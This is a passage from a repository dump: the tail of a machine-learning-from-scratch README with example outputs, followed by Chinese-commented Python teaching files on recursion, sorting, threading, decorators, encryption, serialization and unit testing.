(ReLU) | 0 | (64,) | | Dense | 130 | (2,) | +-------------------+------------+--------------+ Total Parameters: 450 <p align="center"> <img src="http://eriklindernoren.se/images/mlfs_dql1.gif" width="640"> </p> <p align="center"> Figure: Deep Q-Network solution to the CartPole-v1 environment in OpenAI gym. </p> ### Image Reconstruction With RBM $ python mlfromscratch/examples/restricted_boltzmann_machine.py <p align="center"> <img src="http://eriklindernoren.se/images/rbm_digits1.gif" width="640"> </p> <p align="center"> Figure: Shows how the network gets better during training at reconstructing <br> the digit 2 in the MNIST dataset. </p> ### Evolutionary Evolved Neural Network $ python mlfromscratch/examples/neuroevolution.py +---------------+ | Model Summary | +---------------+ Input Shape: (64,) +----------------------+------------+--------------+ | Layer Type | Parameters | Output Shape | +----------------------+------------+--------------+ | Dense | 1040 | (16,) | | Activation (ReLU) | 0 | (16,) | | Dense | 170 | (10,) | | Activation (Softmax) | 0 | (10,) | +----------------------+------------+--------------+ Total Parameters: 1210 Population Size: 100 Generations: 3000 Mutation Rate: 0.01 [0 Best Individual - Fitness: 3.08301, Accuracy: 10.5%] [1 Best Individual - Fitness: 3.08746, Accuracy: 12.0%] ... [2999 Best Individual - Fitness: 94.08513, Accuracy: 98.5%] Test set accuracy: 96.7% <p align="center"> <img src="http://eriklindernoren.se/images/evo_nn4.png" width="640"> </p> <p align="center"> Figure: Classification of the digit dataset by a neural network which has<br> been evolutionary evolved. </p> ### Genetic Algorithm $ python mlfromscratch/examples/genetic_algorithm.py +--------+ | GA | +--------+ Description: Implementation of a Genetic Algorithm which aims to produce the user specified target string. This implementation calculates each candidate's fitness based on the alphabetical distance between the candidate and the target. A candidate is selected as a parent with probabilities proportional to the candidate's fitness. Reproduction is implemented as a single-point crossover between pairs of parents. Mutation is done by randomly assigning new characters with uniform probability. Parameters ---------- Target String: 'Genetic Algorithm' Population Size: 100 Mutation Rate: 0.05 [0 Closest Candidate: 'CJqlJguPlqzvpoJmb', Fitness: 0.00] [1 Closest Candidate: 'MCxZxdr nlfiwwGEk', Fitness: 0.01] [2 Closest Candidate: 'MCxZxdm nlfiwwGcx', Fitness: 0.01] [3 Closest Candidate: 'SmdsAklMHn kBIwKn', Fitness: 0.01] [4 Closest Candidate: ' lotneaJOasWfu Z', Fitness: 0.01] ... [292 Closest Candidate: 'GeneticaAlgorithm', Fitness: 1.00] [293 Closest Candidate: 'GeneticaAlgorithm', Fitness: 1.00] [294 Answer: 'Genetic Algorithm'] ### Association Analysis $ python mlfromscratch/examples/apriori.py +-------------+ | Apriori | +-------------+ Minimum Support: 0.25 Minimum Confidence: 0.8 Transactions: [1, 2, 3, 4] [1, 2, 4] [1, 2] [2, 3, 4] [2, 3] [3, 4] [2, 4] Frequent Itemsets: [1, 2, 3, 4, [1, 2], [1, 4], [2, 3], [2, 4], [3, 4], [1, 2, 4], [2, 3, 4]] Rules: 1 -> 2 (support: 0.43, confidence: 1.0) 4 -> 2 (support: 0.57, confidence: 0.8) [1, 4] -> 2 (support: 0.29, confidence: 1.0) ## Implementations ### Supervised Learning - [Adaboost](mlfromscratch/supervised_learning/adaboost.py) - [Bayesian Regression](mlfromscratch/supervised_learning/bayesian_regression.py) - [Decision Tree](mlfromscratch/supervised_learning/decision_tree.py) - [Elastic Net](mlfromscratch/supervised_learning/regression.py) - [Gradient Boosting](mlfromscratch/supervised_learning/gradient_boosting.py) - [K Nearest Neighbors](mlfromscratch/supervised_learning/k_nearest_neighbors.py) - [Lasso Regression](mlfromscratch/supervised_learning/regression.py) - [Linear Discriminant Analysis](mlfromscratch/supervised_learning/linear_discriminant_analysis.py) - [Linear Regression](mlfromscratch/supervised_learning/regression.py) - [Logistic Regression](mlfromscratch/supervised_learning/logistic_regression.py) - [Multi-class Linear Discriminant Analysis](mlfromscratch/supervised_learning/multi_class_lda.py) - [Multilayer Perceptron](mlfromscratch/supervised_learning/multilayer_perceptron.py) - [Naive Bayes](mlfromscratch/supervised_learning/naive_bayes.py) - [Neuroevolution](mlfromscratch/supervised_learning/neuroevolution.py) - [Particle Swarm Optimization of Neural Network](mlfromscratch/supervised_learning/particle_swarm_optimization.py) - [Perceptron](mlfromscratch/supervised_learning/perceptron.py) - [Polynomial Regression](mlfromscratch/supervised_learning/regression.py) - [Random Forest](mlfromscratch/supervised_learning/random_forest.py) - [Ridge Regression](mlfromscratch/supervised_learning/regression.py) - [Support Vector Machine](mlfromscratch/supervised_learning/support_vector_machine.py) - [XGBoost](mlfromscratch/supervised_learning/xgboost.py) ### Unsupervised Learning - [Apriori](mlfromscratch/unsupervised_learning/apriori.py) - [Autoencoder](mlfromscratch/unsupervised_learning/autoencoder.py) - [DBSCAN](mlfromscratch/unsupervised_learning/dbscan.py) - [FP-Growth](mlfromscratch/unsupervised_learning/fp_growth.py) - [Gaussian Mixture Model](mlfromscratch/unsupervised_learning/gaussian_mixture_model.py) - [Generative Adversarial Network](mlfromscratch/unsupervised_learning/generative_adversarial_network.py) - [Genetic Algorithm](mlfromscratch/unsupervised_learning/genetic_algorithm.py) - [K-Means](mlfromscratch/unsupervised_learning/k_means.py) - [Partitioning Around Medoids](mlfromscratch/unsupervised_learning/partitioning_around_medoids.py) - [Principal Component Analysis](mlfromscratch/unsupervised_learning/principal_component_analysis.py) - [Restricted Boltzmann Machine](mlfromscratch/unsupervised_learning/restricted_boltzmann_machine.py) ### Reinforcement Learning - [Deep Q-Network](mlfromscratch/reinforcement_learning/deep_q_network.py) ### Deep Learning + [Neural Network](mlfromscratch/deep_learning/neural_network.py) + [Layers](mlfromscratch/deep_learning/layers.py) * Activation Layer * Average Pooling Layer * Batch Normalization Layer * Constant Padding Layer * Convolutional Layer * Dropout Layer * Flatten Layer * Fully-Connected (Dense) Layer * Fully-Connected RNN Layer * Max Pooling Layer * Reshape Layer * Up Sampling Layer * Zero Padding Layer + Model Types * [Convolutional Neural Network](mlfromscratch/examples/convolutional_neural_network.py) * [Multilayer Perceptron](mlfromscratch/examples/multilayer_perceptron.py) * [Recurrent Neural Network](mlfromscratch/examples/recurrent_neural_network.py) ## Contact If there's some implementation you would like to see here or if you're just feeling social, feel free to [email](mailto:[email protected]) me or connect with me on [LinkedIn](https://www.linkedin.com/in/eriklindernoren/).
Python-100-Days
bf24146944745bb25c66c82307fd218abd179c6a
File: Day31-35/code/josephu.py def main(): persons = [True] * 30 counter = 0 index = 0 number = 0 while counter < 15: if persons[index]: number += 1 if number == 9: persons[index] = False number = 0 counter += 1 index += 1 index %= len(persons) for person in persons: print('基' if person else '非', end='') print() if __name__ == '__main__': main() File: Day31-35/code/dayofyear.py import sys import mycal def main(): if len(sys.argv) != 4: print('Not enough arguments') return year = int(sys.argv[1]) month = int(sys.argv[2]) day = int(sys.argv[3]) total = 0 for m in range(1, month): total += mycal.get_days(year, m) total += day print(f'{year}年{month}月{day}日是{year}年的第{total}天') if __name__ == '__main__': main() File: Day31-35/code/guess.py #!/usr/bin/python3 # coding: utf-8 from random import randint def main(): answer = randint(1, 100) while True: number = int(input('请输入: ')) if number < answer: print('大一点') elif number > answer: print('小一点') else: print('恭喜你猜对了!') break if __name__ == '__main__': main() File: Day31-35/code/mycal.py #!/usr/bin/python3 from datetime import datetime import sys def is_leap(year): return year % 4 == 0 and year % 100 != 0 or year % 400 == 0 def main(): if len(sys.argv) == 3: month = int(sys.argv[1]) year = int(sys.argv[2]) else: now = datetime.now() date = now.date month = now.month year = now.year m, y = (month, year) if month >= 3 else (month + 12, year - 1) c, y = y // 100, y % 100 w = (y + y // 4 + c // 4 - 2 * c + 26 * (m + 1) // 10) % 7 month_words = [ 'January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December' ] print(f'{month_words[month - 1]} {year}'.center(20)) print('Su Mo Tu We Th Fr Sa') print(' ' * 3 * w, end='') days = [ [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31], [31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31] ][is_leap(year)][month - 1] for day in range(1, days + 1): print(str(day).rjust(2), end=' ') w += 1 if w == 7: print() w = 0 print() if __name__ == '__main__': main() File: Day31-35/code/homework01.py # 经典递归求解问题: # 1. 迷宫寻路 # 2. 汉诺塔(梵塔) # 3. 骑士周游 # 4. 八皇后 def f(n: int, m=1) -> int: if n == 0 or n == 1: return m return f(n - 1, n * m) def sum(n: int) -> int: if n == 1: return 1 return n + sum(n - 1) def steps(n: int, m={}) -> int: if n < 0: return 0 elif n == 0: return 1 else: try: return m[n] except: m[n] = steps(n - 1) + steps(n - 2) + steps(n - 3) return m[n] def list_depth(items: list) -> int: max_depth = 1 if isinstance(items, list) else 0 if max_depth: for item in items: if isinstance(item, list): max_depth = max(max_depth, list_depth(item) + 1) return max_depth def main(): mylist = [1, ['a', ['b', ['c']]],[100, [200, 300, [400, [500, [600, [700]]]]]]] thylist = [[], [[[]]], [[], []]] print(list_depth(mylist)) print(list_depth(thylist)) if __name__ == '__main__': main() File: Day16-20/code/example19.py """ 扩展性系统性能 - 垂直扩展 - 增加单节点处理能力 - 水平扩展 - 将单节点变成多节点(读写分离/分布式集群) 并发编程 - 加速程序执行 / 改善用户体验 耗时间的任务都尽可能独立的执行,不要阻塞代码的其他部分 - 多线程 1. 创建Thread对象指定target和args属性并通过start方法启动线程 2. 继承Thread类并重写run方法来定义线程执行的任务 3. 创建线程池对象ThreadPoolExecutor并通过submit来提交要执行的任务 第3种方式可以通过Future对象的result方法在将来获得线程的执行结果 也可以通过done方法判定线程是否执行结束 - 多进程 - 异步I/O """ import glob import os import time from concurrent.futures import ThreadPoolExecutor from threading import Thread from PIL import Image # class ThumbnailThread(Thread): # def __init__(self, infile): # self.infile = infile # super().__init__() # def run(self): # file, ext = os.path.splitext(self.infile) # filename = file[file.rfind('/') + 1:] # for size in (32, 64, 128): # outfile = f'thumbnails/{filename}_{size}_{size}.png' # image = Image.open(self.infile) # image.thumbnail((size, size)) # image.save(outfile, format='PNG') def gen_thumbnail(infile): file, ext = os.path.splitext(infile) filename = file[file.rfind('/') + 1:] for size in (32, 64, 128): outfile = f'thumbnails/{filename}_{size}_{size}.png' image = Image.open(infile) image.thumbnail((size, size)) image.save(outfile, format='PNG') # def main(): # start = time.time() # threads = [] # for infile in glob.glob('images/*'): # # t = Thread(target=gen_thumbnail, args=(infile, )) # t = ThumbnailThread(infile) # t.start() # threads.append(t) # for t in threads: # t.join() # end = time.time() # print(f'耗时: {end - start}秒') def main(): pool = ThreadPoolExecutor(max_workers=30) futures = [] start = time.time() for infile in glob.glob('images/*'): # submit方法是非阻塞式的方法 # 即便工作线程数已经用完,submit方法也会接受提交的任务 future = pool.submit(gen_thumbnail, infile) futures.append(future) for future in futures: # result方法是一个阻塞式的方法 如果线程还没有结束 # 暂时取不到线程的执行结果 代码就会在此处阻塞 future.result() end = time.time() print(f'耗时: {end - start}秒') # shutdown也是非阻塞式的方法 但是如果已经提交的任务还没有执行完 # 线程池是不会停止工作的 shutdown之后再提交任务就不会执行而且会产生异常 pool.shutdown() if __name__ == '__main__': main() File: Day16-20/code/example09.py """ 装饰器 - 装饰器中放置的通常都是横切关注(cross-concern)功能 所谓横切关注功能就是很多地方都会用到但跟正常业务又逻辑没有必然联系的功能 装饰器实际上是实现了设计模式中的代理模式 - AOP(面向切面编程) """ from functools import wraps from random import randint from time import time, sleep import pymysql def record(output): def decorate(func): @wraps(func) def wrapper(*args, **kwargs): start = time() ret_value = func(*args, **kwargs) output(func.__name__, time() - start) return ret_value return wrapper return decorate def output_to_console(fname, duration): print('%s: %.3f秒' % (fname, duration)) def output_to_file(fname, duration): with open('log.txt', 'a') as file_stream: file_stream.write('%s: %.3f秒\n' % (fname, duration)) def output_to_db(fname, duration): con = pymysql.connect(host='localhost', port=3306, database='test', charset='utf8', user='root', password='123456', autocommit=True) try: with con.cursor() as cursor: cursor.execute('insert into tb_record values (default, %s, %s)', (fname, '%.3f' % duration)) finally: con.close() @record(output_to_console) def random_delay(min, max): sleep(randint(min, max)) def main(): for _ in range(3): # print(random_delay.__name__) random_delay(3, 5) # for _ in range(3): # # 取消掉装饰器 # random_delay.__wrapped__(3, 5) if __name__ == '__main__': main() File: Day16-20/code/example18.py """ 元 - meta 元数据 - 描述数据的数据 - metadata 元类 - 描述类的类 - metaclass - 继承自type """ import threading class SingletonMeta(type): """自定义元类""" def __init__(cls, *args, **kwargs): cls.__instance = None cls.lock = threading.Lock() super().__init__(*args, **kwargs) def __call__(cls, *args, **kwargs): if cls.__instance is None: with cls.lock: if cls.__instance is None: cls.__instance = super().__call__(*args, **kwargs) return cls.__instance class President(metaclass=SingletonMeta): """总统(单例类)""" def __init__(self, name, country): self.name = name self.country = country def __str__(self): return f'{self.country}: {self.name}' def main(): """主函数""" p1 = President('特朗普', '美国') p2 = President('奥巴马', '美国') p3 = President.__call__('克林顿', '美国') print(p1 == p2) print(p1 == p3) print(p1, p2, p3, sep='\n') if __name__ == '__main__': main() File: Day16-20/code/example08.py """ 加密和解密 对称加密 - 加密和解密是同一个密钥 - DES / AES 非对称加密 - 加密和解密是不同的密钥 - RSA pip install pycrypto """ import base64 from hashlib import md5 from Crypto.Cipher import AES from Crypto import Random from Crypto.PublicKey import RSA # # AES加密的密钥(长度32个字节) # key = md5(b'1qaz2wsx').hexdigest() # # AES加密的初始向量(随机生成) # iv = Random.new().read(AES.block_size) def main(): """主函数""" # 生成密钥对 key_pair = RSA.generate(1024) # 导入公钥 pub_key = RSA.importKey(key_pair.publickey().exportKey()) # 导入私钥 pri_key = RSA.importKey(key_pair.exportKey()) message1 = 'hello, world!' # 加密数据 data = pub_key.encrypt(message1.encode(), None) # 对加密数据进行BASE64编码 message2 = base64.b64encode(data[0]) print(message2) # 对加密数据进行BASE64解码 data = base64.b64decode(message2) # 解密数据 message3 = pri_key.decrypt(data) print(message3.decode()) # # AES - 对称加密 # str1 = '我爱你们!' # cipher = AES.new(key, AES.MODE_CFB, iv) # # 加密 # str2 = cipher.encrypt(str1) # print(str2) # # 解密 # cipher = AES.new(key, AES.MODE_CFB, iv) # str3 = cipher.decrypt(str2) # print(str3.decode()) if __name__ == '__main__': main() File: Day16-20/code/test_example01.py """ 单元测试 - 针对程序中最小的功能模块(函数和方法)的测试 测试方法: - 白盒测试:程序自己写的测试 - 黑盒测试:测试人员或QA,不知道代码实现细节,只关注功能 编写Python单元测试 - 定义类继承TestCase,写测试方法(test_开头) 执行单元测试: - unittest.main() - python3 -m unittest test_example01.py 第三方库 - nose2 / pytest pip install pytest pytest-cov pytest -v --cov ------------------------------ pip install nose2 cov-core nose2 -v -C """ from unittest import TestCase from example01 import seq_search, bin_search class TestExample01(TestCase): """测试查找函数的测试用例""" # 执行每个测试函数之前要执行的方法 def setUp(self): self.data1 = [35, 97, 12, 68, 55, 73, 81, 40] self.data2 = [12, 35, 40, 55, 68, 73, 81, 97] # 执行每个测试函数之后要执行的方法 def tearDown(self): pass def test_seq_search(self): """测试顺序查找""" self.assertEqual(0, seq_search(self.data1, 35)) self.assertEqual(2, seq_search(self.data1, 12)) self.assertEqual(6, seq_search(self.data1, 81)) self.assertEqual(7, seq_search(self.data1, 40)) self.assertEqual(-1, seq_search(self.data1, 99)) self.assertEqual(-1, seq_search(self.data1, 7)) def test_bin_search(self): """测试二分查找""" self.assertEqual(1, bin_search(self.data2, 35)) self.assertEqual(0, bin_search(self.data2, 12)) self.assertEqual(6, bin_search(self.data2, 81)) self.assertEqual(2, bin_search(self.data2, 40)) self.assertEqual(7, bin_search(self.data2, 97)) self.assertEqual(-1, bin_search(self.data2, 7)) self.assertEqual(-1, bin_search(self.data2, 99)) File: Day16-20/code/example23.py """ 协程(coroutine)- 可以在需要时进行切换的相互协作的子程序 """ import asyncio from example15 import is_prime def num_generator(m, n): """指定范围的数字生成器""" yield from range(m, n + 1) async def prime_filter(m, n): """素数过滤器""" primes = [] for i in num_generator(m, n): if is_prime(i): print('Prime =>', i) primes.append(i) await asyncio.sleep(0.001) return tuple(primes) async def square_mapper(m, n): """平方映射器""" squares = [] for i in num_generator(m, n): print('Square =>', i * i) squares.append(i * i) await asyncio.sleep(0.001) return squares def main(): """主函数""" loop = asyncio.get_event_loop() future = asyncio.gather(prime_filter(2, 100), square_mapper(1, 100)) future.add_done_callback(lambda x: print(x.result())) loop.run_until_complete(future) loop.close() if __name__ == '__main__': main() File: Day16-20/code/example17.py """ 多重继承 - 一个类有两个或者两个以上的父类 MRO - 方法解析顺序 - Method Resolution Order 当出现菱形继承(钻石继承)的时候,子类到底继承哪个父类的方法 Python 2.x - 深度优先搜索 Python 3.x - C3算法 - 类似于广度优先搜索 """ class A(): def say_hello(self): print('Hello, A') class B(A): pass class C(A): def say_hello(self): print('Hello, C') class D(B, C): pass class SetOnceMappingMixin(): """自定义混入类""" __slots__ = () def __setitem__(self, key, value): if key in self: raise KeyError(str(key) + ' already set') return super().__setitem__(key, value) class SetOnceDict(SetOnceMappingMixin, dict): """自定义字典""" pass def main(): print(D.mro()) # print(D.__mro__) D().say_hello() print(SetOnceDict.__mro__) my_dict= SetOnceDict() my_dict['username'] = 'jackfrued' my_dict['username'] = 'hellokitty' if __name__ == '__main__': main() File: Day16-20/code/example07.py """ 哈希摘要 - 数字签名/指纹 - 单向哈希函数(没有反函数不可逆) 应用领域: 1. 数据库中的用户敏感信息保存成哈希摘要 2. 给数据生成签名验证数据没有被恶意篡改 3. 云存储服务的秒传功能(去重功能) """ class StreamHasher(): """摘要生成器""" def __init__(self, algorithm='md5', size=4096): """初始化方法 @params: algorithm - 哈希摘要算法 size - 每次读取数据的大小 """ self.size = size cls = getattr(__import__('hashlib'), algorithm.lower()) self.hasher = cls() def digest(self, file_stream): """生成十六进制的摘要字符串""" # data = file_stream.read(self.size) # while data: # self.hasher.update(data) # data = file_stream.read(self.size) for data in iter(lambda: file_stream.read(self.size), b''): self.hasher.update(data) return self.hasher.hexdigest() def __call__(self, file_stream): return self.digest(file_stream) def main(): """主函数""" hasher1 = StreamHasher() hasher2 = StreamHasher('sha1') hasher3 = StreamHasher('sha256') with open('Python-3.7.2.tar.xz', 'rb') as file_stream: print(hasher1.digest(file_stream)) file_stream.seek(0, 0) print(hasher2.digest(file_stream)) file_stream.seek(0, 0) print(hasher3(file_stream)) if __name__ == '__main__': main() File: Day16-20/code/example13.py from example12 import EmployeeFactory def main(): """主函数""" emps = [ EmployeeFactory.create('M', '曹操'), EmployeeFactory.create('P', '荀彧', 120), EmployeeFactory.create('P', '郭嘉', 85), EmployeeFactory.create('S', '典韦', 123000), ] for emp in emps: print('%s: %.2f元' % (emp.name, emp.get_salary())) if __name__ == '__main__': main() File: Day16-20/code/example03.py """ 函数递归调用 - 函数直接或者间接的调用了自身 1. 收敛条件 2. 递归公式 n! = n * (n-1)! f(n) = f(n-1) + f(n-2) 1 1 2 3 5 8 13 21 34 55 ... """ from contextlib import contextmanager from time import perf_counter def fac(num): """求阶乘""" assert num >= 0 if num in (0, 1): return 1 return num * fac(num - 1) def fib2(num): """普通函数""" a, b = 1, 1 for _ in range(num - 1): a, b = b, a + b return a def fib3(num): """生成器""" a, b = 0, 1 for _ in range(num): a, b = b, a + b yield a # 动态规划 - 保存可能进行重复运算的中间结果(空间换时间) def fib(num, results={}): """斐波拉切数""" assert num > 0 if num in (1, 2): return 1 try: return results[num] except KeyError: results[num] = fib(num - 1) + fib(num - 2) return results[num] @contextmanager def timer(): try: start = perf_counter() yield finally: end = perf_counter() print(f'{end - start}秒') def main(): """主函数""" # for val in fib3(20): # print(val) # gen = fib3(20) # for _ in range(10): # print(next(gen)) for num in range(1, 121): with timer(): print(f'{num}: {fib(num)}') # print(fac(5)) # print(fac(-5)) if __name__ == '__main__': main() File: Day16-20/code/example12.py """ 面向对象的三大支柱:封装、继承、多态 面向对象的设计原则:SOLID原则 面向对象的设计模式:GoF设计模式(单例、工厂、代理、策略、迭代器) 月薪结算系统 - 部门经理每月15000 程序员每小时200 销售员1800底薪加销售额5%提成 """ from abc import ABCMeta, abstractmethod class Employee(metaclass=ABCMeta): """员工(抽象类)""" def __init__(self, name): self.name = name @abstractmethod def get_salary(self): """结算月薪(抽象方法)""" pass class Manager(Employee): """部门经理""" def get_salary(self): return 15000.0 class Programmer(Employee): """程序员""" def __init__(self, name, working_hour=0): self.working_hour = working_hour super().__init__(name) def get_salary(self): return 200.0 * self.working_hour class Salesman(Employee): """销售员""" def __init__(self, name, sales=0.0): self.sales = sales super().__init__(name) def get_salary(self): return 1800.0 + self.sales * 0.05 class EmployeeFactory(): """创建员工的工厂(工厂模式 - 通过工厂实现对象使用者和对象之间的解耦合)""" @staticmethod def create(emp_type, *args, **kwargs): """创建员工""" emp_type = emp_type.upper() emp = None if emp_type == 'M': emp = Manager(*args, **kwargs) elif emp_type == 'P': emp = Programmer(*args, **kwargs) elif emp_type == 'S': emp = Salesman(*args, **kwargs) return emp File: Day16-20/code/example02.py """ 排序 - 冒泡排序、选择排序、归并排序、快速排序 冒泡排序 - O(n ** 2):两两比较,大的下沉 35, 97, 12, 68, 55, 73, 81, 40 35, 12, 68, 55, 73, 81, 40, [97] 12, 35, 55, 68, 73, 40, [81] 12, 35, 55, 68, 40, [73] ... 选择排序 - O(n ** 2):每次从剩下元素中选择最小 ----------------------------------------- 归并排序 - O(n * log_2 n) - 高级排序算法 35, 97, 12, 68, 55, 73, 81, 40 [35, 97, 12, 68], [55, 73, 81, 40] [35, 97], [12, 68], [55, 73], [81, 40] [35], [97], [12], [68], [55], [73], [81], [40] [35, 97], [12, 68], [55, 73], [40, 81] [12, 35, 68, 97], [40, 55, 73, 81] [12, 35, 40, 55, 68, 73, 81, 97] ----------------------------------------- 快速排序 - 以枢轴为界将列表中的元素划分为两个部分,左边都比枢轴小,右边都比枢轴大 35, 97, 12, 68, 55, 73, 81, 40 35, 12, [40], 68, 55, 73, 81, 97 [12], 35, [40], 68, 55, 73, 81, [97] [12], 35, [40], 55, [68], 73, 81, [97] [12], 35, [40], 55, [68], 73, [81], [97] """ class Person(object): """人""" def __init__(self, name, age): self.name = name self.age = age # def __gt__(self, other): # return self.name > other.name def __str__(self): return f'{self.name}: {self.age}' def __repr__(self): return self.__str__() def select_sort(origin_items, comp=lambda x, y: x < y): """简单选择排序""" items = origin_items[:] for i in range(len(items) - 1): min_index = i for j in range(i + 1, len(items)): if comp(items[j], items[min_index]): min_index = j items[i], items[min_index] = items[min_index], items[i] return items # 函数的设计要尽量做到无副作用(不影响调用者) # 9 1 2 3 4 5 6 7 8 # 9 2 3 4 5 6 7 8 1 # *前面的参数叫位置参数,传参时只需要对号入座即可 # *后面的参数叫命名关键字参数,传参时必须给出参数名和参数值 # *args - 可变参数 - 元组 # **kwargs - 关键字参数 - 字典 def bubble_sort(origin_items, *, comp=lambda x, y: x > y): """冒泡排序""" items = origin_items[:] for i in range(1, len(items)): swapped = False for j in range(i - 1, len(items) - i): if comp(items[j], items[j + 1]): items[j], items[j + 1] = items[j + 1], items[j] swapped = True if swapped: swapped = False for j in range(len(items) - i - 1, i - 1, -1): if comp(items[j - 1], items[j]): items[j], items[j - 1] = items[j - 1], items[j] swapped = True if not swapped: break return items def merge_sort(items, comp=lambda x, y: x <= y): """归并排序""" if len(items) < 2: return items[:] mid = len(items) // 2 left = merge_sort(items[:mid], comp) right = merge_sort(items[mid:], comp) return merge(left, right, comp) def merge(items1, items2, comp=lambda x, y: x <= y): """合并(将两个有序列表合并成一个新的有序列表)""" items = [] index1, index2 = 0, 0 while index1 < len(items1) and index2 < len(items2): if comp(items1[index1], items2[index2]): items.append(items1[index1]) index1 += 1 else: items.append(items2[index2]) index2 += 1 items += items1[index1:] items += items2[index2:] return items def quick_sort(origin_items, comp=lambda x, y: x <= y): """快速排序""" items = origin_items[:] _quick_sort(items, 0, len(items) - 1, comp) return items def _quick_sort(items, start, end, comp): """递归调用划分和排序""" if start < end: pos = _partition(items, start, end, comp) _quick_sort(items, start, pos - 1, comp) _quick_sort(items, pos + 1, end, comp) def _partition(items, start, end, comp): """划分""" pivot = items[end] i = start - 1 for j in range(start, end): if comp(items[j], pivot): i += 1 items[i], items[j] = items[j], items[i] items[i + 1], items[end] = items[end], items[i + 1] return i + 1 def main(): """主函数""" items = [35, 97, 12, 68, 55, 73, 81, 40] # print(bubble_sort(items)) # print(select_sort(items)) # print(merge_sort(items)) print(quick_sort(items)) items2 = [ Person('Wang', 25), Person('Luo', 39), Person('Zhang', 50), Person('He', 20) ] # print(bubble_sort(items2, comp=lambda p1, p2: p1.age > p2.age)) # print(select_sort(items2, comp=lambda p1, p2: p1.name < p2.name)) # print(merge_sort(items2, comp=lambda p1, p2: p1.age <= p2.age)) print(quick_sort(items2, comp=lambda p1, p2: p1.age <= p2.age)) items3 = ['apple', 'orange', 'watermelon', 'durian', 'pear'] # print(bubble_sort(items3)) # print(bubble_sort(items3, comp=lambda x, y: len(x) > len(y))) # print(merge_sort(items3)) print(merge_sort(items3)) if __name__ == '__main__': main() File: Day16-20/code/example22.py """ 多进程和进程池的使用 多线程因为GIL的存在不能够发挥CPU的多核特性 对于计算密集型任务应该考虑使用多进程 time python3 example22.py real 0m11.512s user 0m39.319s sys 0m0.169s """ import concurrent.futures import math PRIMES = [ 1116281, 1297337, 104395303, 472882027, 533000389, 817504243, 982451653, 112272535095293, 112582705942171, 112272535095293, 115280095190773, 115797848077099, 1099726899285419 ] * 5 def is_prime(n): """判断素数""" if n % 2 == 0: return False sqrt_n = int(math.floor(math.sqrt(n))) for i in range(3, sqrt_n + 1, 2): if n % i == 0: return False return True def main(): """主函数""" with concurrent.futures.ProcessPoolExecutor() as executor: for number, prime in zip(PRIMES, executor.map(is_prime, PRIMES)): print('%d is prime: %s' % (number, prime)) if __name__ == '__main__': main() File: Day16-20/code/example16.py """ 魔术方法 如果要把自定义对象放到set或者用作dict的键 那么必须要重写__hash__和__eq__两个魔术方法 前者用来计算对象的哈希码,后者用来判断两个对象是否相同 哈希码不同的对象一定是不同的对象,但哈希码相同未必是相同的对象(哈希码冲撞) 所以在哈希码相同的时候还要通过__eq__来判定对象是否相同 """ class Student(): __slots__ = ('stuid', 'name', 'gender') def __init__(self, stuid, name): self.stuid = stuid self.name = name def __hash__(self): return hash(self.stuid) + hash(self.name) def __eq__(self, other): return self.stuid == other.stuid and \ self.name == other.name def __str__(self): return f'{self.stuid}: {self.name}' def __repr__(self): return self.__str__() class School(): def __init__(self, name): self.name = name self.students = {} def __setitem__(self, key, student): self.students[key] = student def __getitem__(self, key): return self.students[key] def main(): # students = set() # students.add(Student(1001, '王大锤')) # students.add(Student(1001, '王大锤')) # students.add(Student(1001, '白元芳')) # print(len(students)) # print(students) stu = Student(1234, '骆昊') stu.gender = 'Male' # stu.birth = '1980-11-28' print(stu.name, stu.birth) school = School('千锋教育') school[1001] = Student(1001, '王大锤') school[1002] = Student(1002, '白元芳') school[1003] = Student(1003, '白洁') print(school[1002]) print(school[1003]) if __name__ == '__main__': main() File: Day16-20/code/example06.py """ 编码和解码 - BASE64 0-9A-Za-z+/ 1100 0101 1001 0011 0111 0110 00110001 00011001 00001101 00110110 base64 b64encode / b64decode ------------------------------------- 序列化和反序列化 序列化 - 将对象变成字节序列(bytes)或者字符序列(str) - 串行化/腌咸菜 反序列化 - 把字节序列或者字符序列还原成对象 Python标准库对序列化的支持: json - 字符形式的序列化 pickle - 字节形式的序列化 dumps / loads """ import base64 import json import redis from example02 import Person class PersonJsonEncoder(json.JSONEncoder): def default(self, o): return o.__dict__ def main(): cli = redis.StrictRedis(host='120.77.222.217', port=6379, password='123123') data = base64.b64decode(cli.get('guido')) with open('guido2.jpg', 'wb') as file_stream: file_stream.write(data) # with open('guido.jpg', 'rb') as file_stream: # result = base64.b64encode(file_stream.read()) # cli.set('guido', result) # persons = [ # Person('骆昊', 39), Person('王大锤', 18), # Person('白元芳', 25), Person('狄仁杰', 37) # ] # persons = json.loads(cli.get('persons')) # print(persons) # cli.set('persons', json.dumps(persons, cls=PersonJsonEncoder)) if __name__ == '__main__': main() File: Day16-20/code/example11.py """ 变量的作用域以及Python搜索变量的顺序 LEGB: Local --> Embedded --> Global --> Built-in global - 声明或定义全局变量(要么直接使用现有的全局作用域的变量,要么定义一个变量放到全局作用域) nonlocal - 声明使用嵌套作用域的变量(如果嵌套作用域没有对应的变量直接报错) """ x = 100 def foo(): global x x = 200 def bar(): x = 300 print(x) bar() print(x) foo() print(x) File: Day16-20/code/example01.py """ 查找 - 顺序查找和二分查找 算法:解决问题的方法(步骤) 评价一个算法的好坏主要有两个指标:渐近时间复杂度和渐近空间复杂度,通常一个算法很难做到时间复杂度和空间复杂度都很低(因为时间和空间是不可调和的矛盾) 表示渐近时间复杂度通常使用大O标记 O(c):常量时间复杂度 - 哈希存储 / 布隆过滤器 O(log_2 n):对数时间复杂度 - 折半查找 O(n):线性时间复杂度 - 顺序查找 O(n * log_2 n):- 对数线性时间复杂度 - 高级排序算法(归并排序、快速排序) O(n ** 2):平方时间复杂度 - 简单排序算法(冒泡排序、选择排序、插入排序) O(n ** 3):立方时间复杂度 - Floyd算法 / 矩阵乘法运算 也称为多项式时间复杂度 O(2 ** n):几何级数时间复杂度 - 汉诺塔 O(3 ** n):几何级数时间复杂度 也称为指数时间复杂度 O(n!):阶乘时间复杂度 - 旅行经销商问题 - NP """ from math import log2, factorial from matplotlib import pyplot import numpy def seq_search(items: list, elem) -> int: """顺序查找""" for index, item in enumerate(items): if elem == item: return index return -1 def bin_search(items, elem): """二分查找""" start, end = 0, len(items) - 1 while start <= end: mid = (start + end) // 2 if elem > items[mid]: start = mid + 1 elif elem < items[mid]: end = mid - 1 else: return mid return -1 def main(): """主函数(程序入口)""" num = 6 styles = ['r-.', 'g-*', 'b-o', 'y-x', 'c-^', 'm-+', 